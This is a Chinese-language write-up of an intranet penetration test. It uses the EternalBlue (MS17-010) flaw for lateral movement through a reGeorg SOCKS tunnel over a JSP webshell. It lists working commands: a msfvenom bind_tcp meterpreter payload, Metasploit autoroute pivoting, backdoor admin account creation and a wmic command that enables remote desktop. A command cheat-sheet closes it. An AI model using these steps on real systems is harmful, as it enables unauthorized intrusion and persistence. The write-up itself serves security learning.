半途而废的测试(二)
字数 1019 2025-08-19 12:41:36
内网渗透测试实战:利用永恒之蓝漏洞进行横向移动
1. 环境准备与初始访问
-
代理工具配置:
- 使用reGeorg建立Socks代理通道
- 命令:
python2 reGeorgSocksProxy.py -p 12321 -u http://xxxxxx:9090/exp/exp.jsp
-
Metasploit框架准备:
- 启动msfconsole
- 搜索并选择ms17_010漏洞利用模块
2. 内网扫描与目标识别
-
扫描内网主机:
- 使用msf进行内网扫描,发现多台存在永恒之蓝漏洞的主机
- 扫描结果显示约40%的扫描进度就发现了十几台易受攻击主机
-
目标选择策略:
- 随机测试多台主机均未成功
- 发现代理不稳定可能导致利用失败
3. 攻击策略调整
-
Payload选择:
- 使用正向连接payload:
windows/x64/meterpreter/bind_tcp - 生成payload命令:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4443 -f exe > ev.exe
- 使用正向连接payload:
-
会话建立:
- 上传并执行生成的木马
- 使用msf连接目标:
use exploit/multi/handler+ 设置相应参数
-
网络拓扑发现:
- 执行
ifconfig和run get_local_subnets发现多个网段 - 添加路由:
run autoroute -s 192.168.1.0/24
- 执行
4. 漏洞利用技巧
-
常见问题解决:
- 反弹shell失败可能原因:
- 缺少到Kali的路由
- 存在防护设备
- 解决方案:修改payload执行参数
- 反弹shell失败可能原因:
-
权限提升与持久化:
- 添加管理员账号
- 将账号加入管理员组
- 开启远程桌面服务:
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
5. 目标筛选与最终利用
-
目标筛选策略:
- 扫描开放3389端口的主机
- 与存在永恒之蓝漏洞的主机取交集
- 确定最终目标:192.168.1.144
-
成功利用:
- 重复执行前述攻击步骤
- 成功建立远程桌面连接
6. 经验总结与问题记录
-
常见挑战:
- 正向代理连接不稳定
- 有永恒之蓝漏洞的主机可能未开启3389
- 开启3389后可能出现"内部错误"
-
解决思路:
- 重新梳理目标,进行精确扫描
- 寻找漏洞与开放端口的交集主机
- 多次尝试不同payload和参数
-
后续方向:
- 向域控目标推进
- 考虑其他横向移动技术
附录:关键命令速查
# 代理建立
python2 reGeorgSocksProxy.py -p [LOCAL_PORT] -u [TUNNEL_URL]
# Payload生成
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=[PORT] -f exe > output.exe
# 路由添加
run autoroute -s [SUBNET]
# 开启远程桌面
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
注意:实际渗透测试必须获得合法授权,本文仅用于学习目的。